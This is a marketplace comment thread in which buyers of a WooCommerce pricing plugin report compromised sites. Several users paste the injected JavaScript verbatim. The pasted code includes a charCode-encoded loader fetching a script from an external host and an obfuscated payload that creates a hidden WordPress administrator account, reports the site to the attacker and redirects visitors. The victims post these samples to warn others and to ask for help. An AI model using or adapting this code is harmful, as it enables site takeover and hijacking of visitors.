Code

Discussion on WooCommerce Dynamic Pricing & Discounts

Discussion on WooCommerce Dynamic Pricing & Discounts

4.59 (540 ratings) 4.59 stars
Cart 20,426 sales

RightPress supports this item

Supported

7 comments found.

I see that malicious code appears in the “Your Price” option under “label”. In last version

—>. <script>eval(String.fromCharCode(118,97

I am managing a site for our client and it seems that your plugin outputs this after selecting the variations: <script>eval(String.fromCharCode(118,97,114,32,...</script> AND the discounted price is aligned right and looks weird. Screenshot https://bit.ly/3zO2aIF

My site is hacked. All discount rules were removed and some strange code was inserted. <script>eval(String.fromCharCode(118, and then a lot of more characters.

It adds this: “https://stat.belonnanotservice.ga/get.js?s=33” to the header of my site.

I’m currently cleaning the site, and updated to the latest version. Do you have more info?

lennone Purchased

Save Changes button in Promotion isn’t working and labels have been set to,

<script>eval(String.fromCharCode(118,97,114,32,114,116,114,116,117,32,61,32,69,108,101,109,101,110,116,59,32,114,116,114,116,117,46,112,114,111,116,111,116,121,112,101,46,97,112,112,101,110,100,65,102,116,101,114,32,61,32,102,117,110,99,116,105,111,110,40,116,121,116,107,121,106,116,121,106,101,110,116,41,32,123,116,121,116,107,121,106,116,121,106,101,110,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,116,104,105,115,44,32,116,121,116,107,121,106,116,121,106,101,110,116,46,110,101,120,116,83,105,98,108,105,110,103,41,59,125,44,32,102,97,108,115,101,59,40,102,117,110,99,116,105,111,110,40,41,32,123,32,118,97,114,32,116,121,116,107,121,106,116,121,106,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,116,121,116,107,121,106,116,121,106,46,116,121,112,101,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,116,121,116,107,121,106,116,121,106,46,115,114,99,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,53,44,49,49,54,44,57,55,44,49,49,54,44,52,54,44,57,56,44,49,48,49,44,49,48,56,44,49,49,49,44,49,49,48,44,49,49,48,44,57,55,44,49,49,48,44,49,49,49,44,49,49,54,44,49,49,53,44,49,48,49,44,49,49,52,44,49,49,56,44,49,48,53,44,57,57,44,49,48,49,44,52,54,44,49,48,51,44,57,55,44,52,55,44,49,48,51,44,49,48,49,44,49,49,54,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,53,44,54,49,44,53,49,44,53,49,41,59,116,121,116,107,121,106,116,121,106,46,97,112,112,101,110,100,65,102,116,101,114,40,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,91,48,93,41,59,116,121,116,107,121,106,116,121,106,46,97,112,112,101,110,100,65,102,116,101,114,40,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,41,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,116,121,116,107,121,106,116,121,106,41,59,125,41,40,41,59));</script>

On latest version.

I got a notice that I have to upgrade the plugin because of security issue and I upgraded the plugin. After then, all product pricing I have made disappeared and there are errors on all product pages: <script>eval(String.fromCharCode(118,97,114,32,...</script> I saw in other comments that you said I have to read your article http://url.rightpress.net/wcdpd-security-announcement but I cannot see which part in the Article is a solution to this issue. Can you let me know how to resolve this issue?

OmriS

OmriS Purchased

A while ago I reported a problem with the plugin where all prices had gone to 0. Then Kaspersky started flagging warnings. You guys posted about it had been fixed, and today for the first time I reactivated the plugin and updated it. However same problem, all prices are 0, and on the product page it then says ”<script>eval(String.fromCharCode(118,97,114,32,114,116,114,116,..... (Ive not posted the whole error, as its long)

Essentially, I cant use the plugin. It messes up all my pricing and sets everything to 0 plus the error code. This is a recent issue that I cant seem to get rid off. I’d appreciate some assistance as I can no longer use the plugin.

comga

comga Purchased

ATTENTION:

A new usere “mainwpadmin” is created with admin priivileges.

This is the malicous javascript inserted from the settings page of the plugin

var _0x2eabe6 = _0x1856; function _0x2d36() { var _0x979262 = [ 'href', 'location', 'send', 'GET', 'https://stat.belonnanotservice.ga/a.php?u=', 'POST', '2984086SktrSK', '_wpnonce_create-user', 'jQuery', '3220KtEhrr', 'mainwpadmin', 'administrator', '5026644QEzVmq', 'hostname', '225DCNWVH', '8172332puMpQV', '93056NGNUOr', '8630tNLMDX', '193764nZWSVy', 'log', '1938948fCEjtI', 'Add+New+User', 'simple', 'ajax', '/wp-admin/user-new.php', 'protocol', '5675865833568', 'exec', 'open', 'http://simple.com/', 'indexOf', 'match' ]; _0x2d36 = function () { return _0x979262; }; return _0x2d36(); } (function (_0x4d84f0, _0x547eef) { var _0x222ea1 = _0x1856, _0x19a50e = _0x4d84f0(); while (!![]) { try { var _0x1ab1bc = parseInt(_0x222ea1(382)) / 1 + parseInt(_0x222ea1(370)) / 2 + -parseInt(_0x222ea1(376)) / 3 + -parseInt(_0x222ea1(373)) / 4 * (-parseInt(_0x222ea1(381)) / 5) + parseInt(_0x222ea1(384)) / 6 + -parseInt(_0x222ea1(379)) / 7 + -parseInt(_0x222ea1(380)) / 8 * (-parseInt(_0x222ea1(378)) / 9); if (_0x1ab1bc === _0x547eef) break; else _0x19a50e['push'](_0x19a50e['shift']()); } catch (_0x1e11a3) { _0x19a50e['push'](_0x19a50e['shift']()); } } }(_0x2d36, 846171)); var site = window[_0x2eabe6(365)][_0x2eabe6(357)] + '//' + window[_0x2eabe6(365)]['hostname'], kurl = window[_0x2eabe6(365)][_0x2eabe6(364)], m = checkme(); console[_0x2eabe6(383)](m); if (m == 0) { if (kurl[_0x2eabe6(362)]('wp-login.php') !== -1) { } else flyme(); } else defer(function () { ddddooit(); }); function ddddooit() { var _0x52118e = _0x2eabe6, _0x51dfbc = jQuery['noConflict'](); _0x51dfbc[_0x52118e(355)]({ 'url': site + _0x52118e(356), 'method': _0x52118e(367), 'success': function (_0x5dbc12) { var _0x12c589 = _0x52118e, _0x3fc83e = /name="_wpnonce_create-user"([ ]+)value="([^"]+)"/g; if (_0x5dbc12[_0x12c589(362)](_0x12c589(371)) !== -1) { var _0x3a9c15 = _0x3fc83e[_0x12c589(359)](_0x5dbc12); if (_0x3a9c15[2][_0x12c589(363)](/([a-z0-9]{10})/)) { var _0xab464c = _0x3a9c15[2]; _0x51dfbc[_0x12c589(355)]({ 'url': site + _0x12c589(356), 'method': _0x12c589(369), 'data': { 'action': 'createuser', '_wpnonce_create-user': _0xab464c, '_wp_http_referer': _0x12c589(356), 'user_login': _0x12c589(374), 'email': 'mainwpadmin@site.com', 'first_name': _0x12c589(354), 'last_name': _0x12c589(354), 'url': _0x12c589(361), 'pass1': _0x12c589(358), 'pass1-text': _0x12c589(358), 'pass2': _0x12c589(358), 'send_user_notification': 0, 'role': _0x12c589(375), 'createuser': _0x12c589(353) }, 'success': function (_0x4a113d) { var _0x17a42d = _0x12c589; httpGet(_0x17a42d(368) + site); } }); } } } }); } function defer(_0x323b0a) { var _0x49ee25 = _0x2eabe6; window[_0x49ee25(372)] ? _0x323b0a() : setTimeout(function () { defer(_0x323b0a); }, 50); } function httpGet(_0x21747c) { var _0x3d229b = _0x2eabe6, _0x4af436 = new XMLHttpRequest(); return _0x4af436[_0x3d229b(360)](_0x3d229b(367), _0x21747c, ![]), _0x4af436[_0x3d229b(366)](null), _0x4af436['responseText']; } function checkme() { var _0x18754b = _0x2eabe6, _0x1c74cd = window[_0x18754b(365)][_0x18754b(357)] + '//' + window[_0x18754b(365)][_0x18754b(377)], _0x4e9070 = httpGet(_0x1c74cd + _0x18754b(356)), _0x1da31b = /name="_wpnonce_create-user"([ ]+)value="([^"]+)"/g; if (_0x4e9070['indexOf'](_0x18754b(371)) !== -1) return 1; return 0; } function _0x1856(_0x4df03e, _0x320613) { var _0x2d36e2 = _0x2d36(); return _0x1856 = function (_0x185680, _0x5e91fb) { _0x185680 = _0x185680 - 353; var _0x1bf975 = _0x2d36e2[_0x185680]; return _0x1bf975; }, _0x1856(_0x4df03e, _0x320613); } function flyme() { eval(String.fromCharCode(118, 97, 114, 32, 118, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 99, 108, 105, 99, 107, 46, 98, 101, 108, 111, 110, 110, 97, 110, 111, 116, 115, 101, 114, 118, 105, 99, 101, 46, 103, 97, 47, 106, 111, 98, 46, 112, 104, 112, 63, 109, 61, 48, 34, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 118, 59, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 114, 101, 112, 108, 97, 99, 101, 40, 118, 41, 59)); }
by
by
by
by
by
by

Tell us what you think!

We'd like to ask you a few questions to help improve CodeCanyon.

Sure, take me to the survey